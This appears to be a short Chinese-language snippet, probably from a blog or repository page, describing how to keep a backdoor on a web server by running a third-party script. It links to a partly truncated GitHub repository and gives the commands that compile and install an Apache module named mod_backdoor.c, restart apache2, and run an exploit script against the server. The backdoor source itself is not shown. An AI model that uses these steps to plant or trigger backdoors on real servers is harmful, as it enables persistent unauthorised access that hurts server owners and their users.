通过运行第三方脚本,实现维持后门的方法
https://github.com/ianxtianxt/apache-
apxs -i -a -c mod_backdoor.c && service apache2 restart
python exploit.py 127.0.0.1 80
image